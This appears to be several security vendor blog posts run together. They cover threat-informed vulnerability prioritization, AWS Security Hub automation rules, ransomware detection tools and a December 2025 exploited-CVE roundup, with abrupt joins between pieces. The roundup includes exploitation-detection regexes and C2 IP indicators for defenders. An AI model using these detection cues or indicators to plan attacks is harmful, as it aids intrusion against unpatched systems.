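        "dark_web_chatter": 15,      # discussion in criminal forums
        "threat_actor_interest": 20, # named groups linked to the CVE
    }
    score = sum(w for signal, w in weights.items() if signals.get(signal))
    return min(score, 100)

# As conditions change, so does the score:
before = dynamic_risk_score({"exploit_code_public": True})   # 25
after = dynamic_risk_score({"exploit_code_public": True,
                            "active_exploitation": True,
                            "threat_actor_interest": True})  # 85
```

The point of the sketch is the shape, not the numbers: the score is recomputed whenever new evidence arrives, so prioritization tracks attacker behavior rather than a one-time severity rating.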
The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.
See Your Risk Like an Attacker: The Full Attack Surface View
In today’s threat landscape, security teams must rethink their roles. Rather than operating reactively and defensively at all times, they should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.
The Visibility Gap: Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.
Attack Surface Intelligence Explained: Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.
Connecting the Dots with Vulnerability Tools: When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.
Three Strategic Recommendations for Security Leaders
Most organizations remain behind the curve in threat and vulnerability management. There are three strategic steps security leaders can take to reclaim control.
1. Bridge the Gap Between Security and IT
Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.
2. Embrace Automation and Workflow Integration
Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.
3. Measure What Matters — Time-to-Remediate (TTR)
Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.
The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy
Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.
Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.
Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.
By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.
Frequently Asked Questions
What is the primary difference between a Vulnerability and a Threat?
A Vulnerability is a weakness or flaw in an asset (e.g., unpatched software, misconfiguration) that could be exploited. A Threat is a person, group, or event (e.g., a threat actor, a piece of malware) that has the potential to exploit that vulnerability to cause harm.
What is the biggest challenge facing traditional vulnerability management programs today?
The biggest challenge is alert fatigue and prioritization noise. Traditional programs generate an overwhelming number of vulnerabilities, often relying only on the technical severity score (like CVSS). This leads security teams to waste time patching low-risk flaws while critical, actively exploited vulnerabilities remain unaddressed.
Why is integrating external threat intelligence mandatory for TVM in 2026?
External threat intelligence provides real-time context on the threat landscape. These days, it’s mandatory because it allows security teams to identify which vulnerabilities are being actively exploited in the wild, have associated proof-of-concept (PoC) code, or are being discussed on the dark web, enabling true risk-based prioritization.
How does Recorded Future Vulnerability Intelligence help with prioritization?
Recorded Future Vulnerability Intelligence automatically assigns a dynamic Risk Score to every CVE by correlating it with real-time threat intelligence from across the internet, including evidence of active exploitation, malware associations, and dark web chatter. This lets teams instantly know if a vulnerability is a theoretical risk or an immediate, active threat requiring urgent attention.
What is Attack Surface Intelligence, and what role does it play in TVM?
Attack Surface Intelligence is the continuous process of identifying and monitoring all external-facing assets of an organization (like public IPs, domains, and cloud services). In TVM, it is crucial to ensure that vulnerabilities are not just identified on known assets, but also on shadow IT and unknown exposed systems that are most likely to be targeted by adversaries.
How does the TVM lifecycle differ from the traditional vulnerability management lifecycle?
While both involve Discovery, Assessment, and Remediation, the TVM lifecycle adds an explicit Threat Analysis step before prioritization. The modern TVM cycle typically runs: continuous asset discovery, vulnerability assessment, threat context enrichment, risk-based prioritization, and automated remediation with verification.
A new version of AWS Security Hub is now generally available, introducing new ways for organizations to manage and respond to security findings. The enhanced Security Hub helps you improve your organization’s security posture and simplify cloud security operations by centralizing security management across your Amazon Web Services (AWS) environment. The new Security Hub transforms how organizations handle security findings through advanced automation capabilities with real-time risk analytics, automated correlation, and enriched context that you can use to prioritize critical issues and reduce response times. Automation also helps ensure consistent response procedures and helps you meet compliance requirements.
AWS Security Hub CSPM (cloud security posture management) is now an integral part of the detection engines for Security Hub. Security Hub provides centralized visibility across multiple AWS security services to give you a unified view of your cloud environment, including risk-based prioritization views, attack path visualization, and trend analytics that help you understand security patterns over time.
This is the third post in our series on the new Security Hub capabilities. In our first post, we discussed how Security Hub unifies findings across AWS services to streamline risk management. In the second post, we shared the steps to conduct a successful Security Hub proof of concept (PoC).
In this post, we walk through the setup and configuration of automation rules, share best practices for creating effective response workflows, and provide real-world examples of how these tools can be used to automate remediation, escalate high-severity findings, and support compliance requirements.
Security Hub automation responds automatically to security findings, helping ensure that critical findings reach the right teams quickly. This reduces manual effort and response time for common security incidents while maintaining consistent remediation processes.
Note: Automation rules evaluate new and updated findings that Security Hub generates or ingests after you create the rules, not historical findings.
Why automation matters in cloud security
Organizations often operate across hundreds of AWS accounts, multiple AWS Regions, and diverse services—each producing findings that must be triaged, investigated, and acted upon. Without automation, security teams face high volumes of alerts, duplication of effort, and the risk of delayed responses to critical issues.
Manual processes can’t keep pace with cloud operations; automation helps solve this by changing your security operations in three ways. Automation filters and prioritizes findings based on your criteria, showing your team only relevant alerts. When issues are detected, automated responses trigger immediately—no manual intervention needed.
If you’re managing multiple AWS accounts, automation applies consistent policies and workflows across your environment through centralized management, shifting your security team from chasing alerts to proactively managing risk before issues escalate.
Designing routing strategies for security findings
With Security Hub configured, you’re ready to design a routing strategy for your findings and notifications. When designing your routing strategy, ask whether your existing Security Hub configuration meets your security requirements. Consider whether Security Hub automations can help you meet security framework requirements like NIST 800-53 and identify KPIs and metrics to measure whether your routing strategy works.
Security Hub automation rules and automated responses can help you meet the preceding requirements; however, it’s important to understand how your compliance teams, incident responders, security operations personnel, and other security stakeholders operate on a day-to-day basis. For example, do teams use the AWS Management Console for AWS Security Hub regularly? Or do you need to send most findings downstream to an IT service management (ITSM) tool (such as Jira or ServiceNow) or third-party security orchestration, automation, and response (SOAR) platforms for incident tracking, workflow management, and remediation?
Next, create and maintain an inventory of critical applications. This helps you adjust finding severity based on business context and your incident response playbooks.
Consider the scenario where Security Hub identifies a medium-severity vulnerability on an Amazon Elastic Compute Cloud (Amazon EC2) instance. In isolation, this might not trigger immediate action. When you add business context—such as strategic objectives or business criticality—you might discover that this instance hosts a critical payment processing application, revealing the true risk. By implementing Security Hub automation rules with enriched context, this finding can be upgraded to critical severity and automatically routed to ServiceNow for immediate tracking. In addition, by using Security Hub automation with Amazon EventBridge, you can trigger an AWS Systems Manager Automation document to isolate the EC2 instance for security forensics work to then be carried out.
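A scenario like this can be expressed as an automation rule. The sketch below builds such a rule as a plain payload; the field shapes approximate the Security Hub CreateAutomationRule API, and the tag key, rule name, and note text are hypothetical, so verify against the current API reference before use:

```python
# Sketch of an automation rule that upgrades a medium-severity finding to
# critical when it affects a resource tagged as business-critical. Field
# shapes approximate the Security Hub CreateAutomationRule API; the tag
# key and descriptive strings are hypothetical.

rule = {
    "RuleName": "Upgrade findings on payment-processing instances",
    "RuleOrder": 10,
    "RuleStatus": "ENABLED",
    "Description": "Raise severity for findings on business-critical EC2 instances",
    "Criteria": {
        "SeverityLabel": [{"Value": "MEDIUM", "Comparison": "EQUALS"}],
        "ResourceTags": [{"Key": "BusinessCriticality", "Value": "critical",
                          "Comparison": "EQUALS"}],
    },
    "Actions": [{
        "Type": "FINDING_FIELDS_UPDATE",
        "FindingFieldsUpdate": {
            "Severity": {"Label": "CRITICAL"},
            "Note": {"Text": "Hosts payment processing; escalated by automation",
                     "UpdatedBy": "sechub-automation"},
        },
    }],
}

# In a real deployment you would pass this payload to boto3, for example:
#   boto3.client("securityhub").create_automation_rule(**rule)
```

The criteria select which findings the rule matches; the action rewrites finding fields so downstream routing (for example, a ServiceNow integration keyed on critical severity) picks the finding up automatically.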
Because Security Hub supports the Open Cybersecurity Schema Framework (OCSF), you can use the extensive schema elements that OCSF offers to target findings for automation and help your organization meet security strategy requirements.
Example use cases
Security Hub automation supports many use cases. Talk with your teams to understand which fit your needs and security objectives. The following are some examples of how you can use Security Hub automation:
Automated finding remediation
Use automated finding remediation to automatically fix security issues as they’re detected.
Supporting patterns:
Direct remediation: Trigger AWS Lambda functions to fix misconfigurations
Resource tagging: Add tags to non-compliant resources for tracking
Configuration correction: Update resource configurations to match security policies
Step 2: Create automation rules to update finding details and third-party integration
After Security Hub collects findings, you can create automation rules to update and route the findings to the appropriate teams. The steps to create automation rules that update finding details or set up a third-party integration—such as Jira or ServiceNow—based on criteria you define can be found in Creating automation rules in Security Hub.
With automation rules, Security Hub evaluates findings against the defined rule and then makes the appropriate finding update or calls the APIs to send findings to Jira or ServiceNow. Security Hub sends a copy of every finding to Amazon EventBridge so that you can also implement your own automated response (if needed) for use cases outside of using Security Hub automation rules.
In addition to sending a copy of every finding to EventBridge, Security Hub classifies and enriches security findings according to business context, then delivers them to the appropriate downstream services (such as ITSM tools) for fast response.
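For the EventBridge path, a rule's event pattern might look like the following. The detail-type is Security Hub's documented value for imported findings; the specific filtering fields shown are one plausible choice, and the rule name in the comment is hypothetical:

```python
import json

# Sketch of an EventBridge event pattern matching the copy of each
# high- and critical-severity finding that Security Hub sends to
# EventBridge. The detail-type is Security Hub's documented value;
# the severity and workflow filters are one plausible choice.
event_pattern = {
    "source": ["aws.securityhub"],
    "detail-type": ["Security Hub Findings - Imported"],
    "detail": {
        "findings": {
            "Severity": {"Label": ["HIGH", "CRITICAL"]},
            "Workflow": {"Status": ["NEW"]},
        }
    },
}

# In a real deployment this pattern would be attached to a rule whose
# target is, for example, a Lambda function or an SNS topic:
#   boto3.client("events").put_rule(
#       Name="route-critical-findings",
#       EventPattern=json.dumps(event_pattern))
print(json.dumps(event_pattern, indent=2))
```

Keeping the pattern narrow (severity plus workflow status) is what prevents the downstream Lambda function or SNS topic from being invoked for every finding copy Security Hub emits.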
Best practices
AWS Security Hub automation rules offer capabilities for automatically updating findings and integrating with other tools. When implementing automation rules, follow these best practices:
Centralized management: Only the Security Hub administrator account can create, edit, delete, and view automation rules. Ensure proper access control and management of this account.
Regional deployment: Automation rules can be created in one AWS Region and then applied across configured Regions. When using Region aggregation, you can only create rules in the home Region. If you create an automation rule in an aggregation Region, it will be applied in all included Regions. If you create an automation rule in a non-linked Region, it will be applied only in that Region. For more information, see Creating automation rules in Security Hub.
Define specific criteria: Clearly define the criteria that findings must match for the automation rule to apply. This can include finding attributes, severity levels, resource types, or member account IDs.
Understand rule order: Rule order matters when multiple rules apply to the same finding or finding field. Security Hub applies rules with a lower numerical value first. If multiple rules have the same RuleOrder, Security Hub applies the rule with the earlier UpdatedAt value first (that is, the most recently edited rule applies last). For more information, see Updating the rule order in Security Hub.
Provide clear descriptions: Include a detailed rule description to provide context for responders and resource owners, explaining the rule’s purpose and expected actions.
Use automation for efficiency: Use automation rules to automatically update finding fields (such as severity and workflow status), suppress low-priority findings, or create tickets in third-party tools such as Jira or ServiceNow for findings matching specific attributes.
Consider EventBridge for external actions: While automation rules handle internal Security Hub finding updates, use EventBridge rules to trigger actions outside of Security Hub, such as invoking Lambda functions or sending notifications to Amazon Simple Notification Service (Amazon SNS) topics based on specific findings. Automation rules take effect before EventBridge rules are applied. For more information, see Automation rules in EventBridge.
Manage rule limits: There is a maximum of 100 automation rules per administrator account. Plan your rule creation strategically to stay within this limit.
Regularly review and refine: Periodically review automation rules, especially suppression rules, to ensure they remain relevant and effective, adjusting them as your security posture evolves.
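The rule-order semantics described above reduce to a simple sort. In the sketch below, rule names and timestamps are illustrative:

```python
# Sketch of the documented ordering semantics: lower RuleOrder applies
# first; ties are broken by earlier UpdatedAt, so the most recently
# edited rule applies last. Names and timestamps are illustrative.
from datetime import datetime

rules = [
    {"name": "suppress-sandbox", "RuleOrder": 20,
     "UpdatedAt": datetime(2025, 3, 1)},
    {"name": "escalate-payment", "RuleOrder": 10,
     "UpdatedAt": datetime(2025, 5, 1)},
    {"name": "tag-owner", "RuleOrder": 10,
     "UpdatedAt": datetime(2025, 1, 15)},
]

apply_order = sorted(rules, key=lambda r: (r["RuleOrder"], r["UpdatedAt"]))
print([r["name"] for r in apply_order])
# ['tag-owner', 'escalate-payment', 'suppress-sandbox']
```

Because the last rule to touch a field wins, a recently edited rule at the same RuleOrder effectively overrides its older sibling, which is worth remembering when two rules update the same finding field.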
Conclusion
You can use Security Hub automation to triage, route, and respond to findings faster through a unified cloud security solution with centralized management. In this post, you learned how to create automation rules that route findings to ticketing system integrations and upgrade critical findings for immediate response. Through the intuitive and flexible approach to automation that Security Hub provides, your security teams can make confident, data-driven decisions about Security Hub findings that align with your organization’s overall security strategy.
With Security Hub automation features, you can centrally manage security across hundreds of accounts while your teams focus on critical issues that matter most to your business. By implementing the automation capabilities described in this post, you can streamline response times at scale, reduce manual effort, and improve your overall security posture through consistent, automated workflows.
Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.
The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.
Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.
Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.
Introduction
The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.
The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the 2025 Verizon Data Breach Investigations Report. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.
This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g., reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).
The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.
The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.
The Ransomware Detection Tool Landscape: Three Pillars of Defense
Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.
1. Endpoint and Extended Detection and Response (EDR/XDR) Tools
EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.
Core Functionality
EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.
How Threat Intelligence Enhances EDR/XDR
Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.
Example Tools
CrowdStrike Falcon delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.
Microsoft Defender XDR integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.
SentinelOne employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.
2. Network Detection and Response (NDR) Tools
While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.
Core Functionality
NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.
How Threat Intelligence Improves NDR and Deception
Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.
Example Tools
Vectra AI specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.
ExtraHop Reveal(x) provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.
Illusive (now part of Zscaler) deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.
3. Threat Intelligence Tools
The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.
Core Functionality
Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.
How Threat Intelligence Strengthens Ransomware Detection
These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:
Threat Mapping: Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are profiled by their TTPs to assess both their intent and their opportunity to carry out a successful attack against your business.
Infrastructure Tracking: Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.
Variant Identification: Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.
Exploitation Intelligence: Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.
Recorded Future delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.
Flashpoint specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.
Google Threat Intelligence (formerly Mandiant) combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.
Choosing the Right Ransomware Detection Tools
Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.
Security leaders should prioritize:
Pre-encryption visibility: Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.
Context-rich alerts: Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.
Integration maturity: Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.
Operational efficiency: Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.
Relevance: Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.
Scalability: Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.
How Recorded Future Enables Early Ransomware Detection
The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is alert fatigue, which drains analyst time on false positives instead of credible threats.
Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.
Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.
Proactive Mitigation Through Vulnerability Intelligence
Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.
The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.
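This exploitation-first prioritization can be sketched in a few lines. A minimal sketch, assuming a simple list of CVE records; the field names (`actively_exploited`, `poc_public`, `cvss`) are illustrative, not a real Recorded Future schema:

```python
# Rank vulnerabilities by exploitation evidence first, then raw severity,
# so an actively exploited medium-severity CVE outranks an unexploited 9.8.
def patch_priority(vulns):
    """Sort CVE records: actively exploited first, public PoC next, then CVSS."""
    def key(v):
        return (
            not v.get("actively_exploited", False),  # exploited sorts first
            not v.get("poc_public", False),          # public PoC sorts next
            -v.get("cvss", 0.0),                     # then severity, descending
        )
    return sorted(vulns, key=key)

vulns = [
    {"cve": "CVE-A", "cvss": 9.8, "actively_exploited": False, "poc_public": False},
    {"cve": "CVE-B", "cvss": 6.5, "actively_exploited": True,  "poc_public": True},
    {"cve": "CVE-C", "cvss": 8.1, "actively_exploited": False, "poc_public": True},
]
ranked = [v["cve"] for v in patch_priority(vulns)]
```

Here CVE-B, the only actively exploited entry, ranks first despite having the lowest CVSS score, which is exactly the reordering the text describes.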
Victimology and Anticipation
Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.
This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.
Shifting From Reactive Response to Intelligence-Led Prevention
No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.
Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.
Frequently Asked Questions
Can behavioral analytics alone stop zero-day ransomware variants?
While powerful, behavioral analytics alone cannot guarantee a stop to a true zero-day ransomware variant. It excels at detecting malicious behavior (like mass file encryption or privilege escalation), even from unknown malware. The most effective defense is a combination of behavioral analytics, up-to-the-minute threat intelligence on emerging TTPs, and controlled execution (sandboxing).
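The behavioral signal mentioned here, a burst of file writes that look encrypted, can be approximated with byte entropy. A minimal sketch under stated assumptions (synthetic write events, illustrative thresholds), not a production detector:

```python
import math

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 8.0 for encrypted/compressed data, lower for plaintext."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def looks_like_mass_encryption(write_events, entropy_threshold=7.5, burst=100):
    """Flag a burst of high-entropy file writes, a common ransomware signal.

    write_events: iterable of {"data": bytes} records from a file monitor.
    Thresholds are illustrative; real products tune them per environment.
    """
    high_entropy = [e for e in write_events
                    if shannon_entropy(e["data"]) > entropy_threshold]
    return len(high_entropy) >= burst
```

A single high-entropy write proves nothing (compressed archives look the same), which is why the heuristic keys on the burst rate as well as the entropy.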
What is the most common weakness of signature-based ransomware detection methods today?
The primary weakness is their reactive nature. Signature-based tools only detect known threats—they require a threat to be analyzed and its signature created before they can flag it. They are easily bypassed by polymorphic ransomware or customized, novel variants that threat actors create to evade detection.
How can Recorded Future's SecOps Intelligence Module help my existing EDR/XDR tool detect ransomware faster?
Recorded Future's SecOps Intelligence Module ingests and correlates massive amounts of external threat data. It directly integrates with your existing EDR/XDR tools, enriching alerts with real-time context (Risk Scores, actor TTPs, associated malware). This helps your existing tools move beyond basic indicators, prioritize critical alerts, and automatically initiate responses before a potential ransomware event escalates.
How does Recorded Future provide victimology data to anticipate ransomware attacks targeting my industry?
Recorded Future's Threat Intelligence Module provides crucial victimology and actor insights. It monitors real-time chatter on the dark web and forums to identify specific ransomware groups, their infrastructure, and the industries or regions they are planning to target next. This allows you to prioritize defenses based on pre-attack relevance.
Is a dedicated deception technology platform considered a primary ransomware detection tool?
Deception technology is not a primary prevention tool, but it is an extremely effective early detection tool. It places fake assets (honeypots, fake credentials) within the network. When an attacker, particularly ransomware moving laterally, interacts with a decoy, it immediately triggers a high-fidelity alert, providing security teams with crucial seconds to isolate the endpoint and stop the attack before encryption begins.
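A decoy's value comes from the fact that no legitimate process should ever touch it. The following hypothetical sketch shows the principle with a minimal TCP canary; real deception platforms add realistic fake assets and credentials on top of this idea:

```python
import socket
import threading

def alert_for(addr):
    """Format the high-fidelity alert raised when a decoy is touched."""
    return f"DECOY TOUCHED: possible lateral movement from {addr[0]}:{addr[1]}"

def run_decoy(host="127.0.0.1", port=0, on_alert=print):
    """Listen in a background thread; any connection triggers an alert.

    Port 0 asks the OS for an ephemeral port; the bound port is returned
    so decoys can be scattered across many ports.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(5)

    def loop():
        while True:
            conn, addr = srv.accept()
            on_alert(alert_for(addr))  # every touch is suspicious by definition
            conn.close()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]
```

Because the service has no legitimate users, the false-positive rate is effectively zero, which is what makes deception alerts "high-fidelity."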
December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.
What security teams need to know:
React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines
Legacy vulnerabilities resurface: CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps
Bottom line: December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.
Quick Reference Table
All 22 vulnerabilities below were actively exploited in December 2025.
CVE-2025-55182 | React Server Components (React2Shell)
Why this matters: Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.
Affected versions:
React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)
Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77
Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin
Immediate actions:
Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately
Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5
Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints
Check logs for E{"digest" error patterns indicating exploitation attempts
Review server processes for unexpected Node.js child processes
Exposure: ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)
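The log-hunting steps above can be scripted. A hedged sketch that sweeps log lines for the two indicators called out in the actions list (the E{"digest" error pattern and multipart/form-data POSTs); log formats vary widely, so the regexes are illustrative only:

```python
import re

# Indicator 1: RSC error leakage containing the E{"digest" pattern.
DIGEST_ERR = re.compile(r'E\{"digest"')
# Indicator 2: POST requests carrying multipart/form-data, consistent with
# Next.js Server Actions / RSC endpoint abuse.
RSC_POST = re.compile(r'"POST [^"]*".*multipart/form-data', re.IGNORECASE)

def suspicious_lines(log_lines):
    """Return lines matching either React2Shell exploitation indicator."""
    return [ln for ln in log_lines
            if DIGEST_ERR.search(ln) or RSC_POST.search(ln)]
```

Matches are leads, not verdicts: legitimate uploads also use multipart/form-data, so flagged lines still need triage against source IP and request path.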
Figure 1: Vulnerability Intelligence Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)
CVE-2025-20393 | Cisco Secure Email Gateway
Risk Score: 99 (Very Critical) | Active exploitation by UAT-9686
Why this matters: Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.
Affected products: Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS
Immediate actions:
Apply Cisco's security updates immediately
Monitor Spam Quarantine web interface access logs
Check for modifications to /data/web/euq_webui/htdocs/index.py
Hunt for AquaShell, AquaPurge, and AquaTunnel indicators
Review outbound connections to suspicious IPs
Known C2 infrastructure: 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)
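Two of the hunt steps above, checking the watched index.py file and flagging connections to the listed C2 IPs, can be scripted. A hedged sketch; the baseline-hash comparison and netstat-style parsing are assumptions about your environment, not Cisco tooling:

```python
import hashlib
from pathlib import Path

# The watched file path and C2 IPs come from the advisory text above;
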